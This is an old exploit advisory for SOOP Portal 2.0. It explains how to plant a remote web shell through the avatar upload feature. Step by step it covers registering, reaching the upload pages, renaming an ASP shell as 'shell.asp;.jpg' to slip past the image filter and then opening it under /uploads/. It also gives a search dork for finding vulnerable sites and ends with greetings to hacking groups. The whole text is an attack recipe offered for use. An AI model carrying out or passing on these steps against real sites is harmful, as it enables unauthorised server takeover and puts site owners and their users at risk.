47 lines
No EOL
1.4 KiB
Text
47 lines
No EOL
1.4 KiB
Text
#################################################################
|
|
# I N F O
|
|
# Exploit Title: SOOP Portal 2.0 Remote Upload Shell Vulnerability
|
|
# DDate: 05-12-2010
|
|
# Author: Net.Edit0r
|
|
# Software Link: www.soopportal.com
|
|
# Version: 2.0
|
|
# Tested on: windows server 2008
|
|
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
|
|
|
|
[~]######################################### E X P L O I T
|
|
#############################################[~]
|
|
#
|
|
# 1. Register On Site
|
|
#
|
|
# 2. http://server/member_form.asp?do=5&mid=4
|
|
#
|
|
# 3. Current avatar [ Browse/Upload ]
|
|
#
|
|
# 4. http://server/assetman3.asp?mode=1&ffilter=image
|
|
#
|
|
# 4. Asp renamed via the .asp;.jpg (shell.asp;.jpg)
|
|
#
|
|
# 5. http://server/uploads/ [You can get the address at the
|
|
See Shell Shell upload]
|
|
#
|
|
# 6. In this section, file in the folder that you have selected in
|
|
the previous section is placed .
|
|
#
|
|
# 7 . Example URL : http://server/uploads/
|
|
#
|
|
# Dork : "SOOP Portal 2.0"
|
|
#
|
|
#
|
|
[~]######################################### ThankS To ...
|
|
###########################################[~]
|
|
#
|
|
# Special Thanks To : HUrr!c4nE, Cair3x, B3hz4d, M4hd1,
|
|
Skitt3r,Hussin-v ,Virus_Baghdad ,snIPer alBlDeat
|
|
#
|
|
# 7-Team: virangar, H-SK33PY , farzadho ,n3me3iz ,mmilad200 , fr0nk,
|
|
bLaCk.bytE , Satanic2000
|
|
#
|
|
# BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker ~ Mikili
|
|
#
|
|
[~]######################################### FinisH :D
|
|
#############################################[~] |